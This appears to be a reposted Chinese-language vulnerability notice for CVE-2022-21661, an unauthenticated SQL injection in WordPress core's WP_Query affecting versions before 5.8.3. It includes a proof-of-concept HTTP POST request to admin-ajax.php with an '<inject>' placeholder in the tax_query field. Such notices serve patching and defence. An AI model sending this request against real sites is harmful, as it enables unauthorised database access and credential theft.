CVE-2022-21661 – WordPress 核心 5.8.2 –“WP_Query”SQL 注入
2022-12-5 09:19:39 Author: Ots安全(查看原文) 阅读量:32 收藏

此漏洞允许远程攻击者泄露有关受影响的 WordPress 核心安装的敏感信息,不需要身份验证即可利用此漏洞,具体缺陷存在于 WP_Query 类中。

该问题是由于在使用用户提供的字符串构建 SQL 查询之前未对其进行适当验证造成的,攻击者可以利用此漏洞泄露存储的凭据,从而导致进一步的危害。

受影响的版本 版本:< 5.8.3

# [ Exploit Code ] :
POST /wp-admin/admin-ajax.php HTTP/1.1Host: localhostUpgrade-Insecure_Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteSec-Fetch-User: ?1Cache-Control: max-age=0Connection: close Content-Type: application/x-www-form-urlencoded
action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

参考:https://github.com/APTIRAN/CVE-2022-21661


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496107&idx=1&sn=5771111f1ce0a15cb19cc492379a5bd6&chksm=9badb8e0acda31f6a06cfc522de2b13f31478063aebc4dc247a03173e591a9e5e2885db83689#rd
如有侵权请联系:admin#unsafe.sh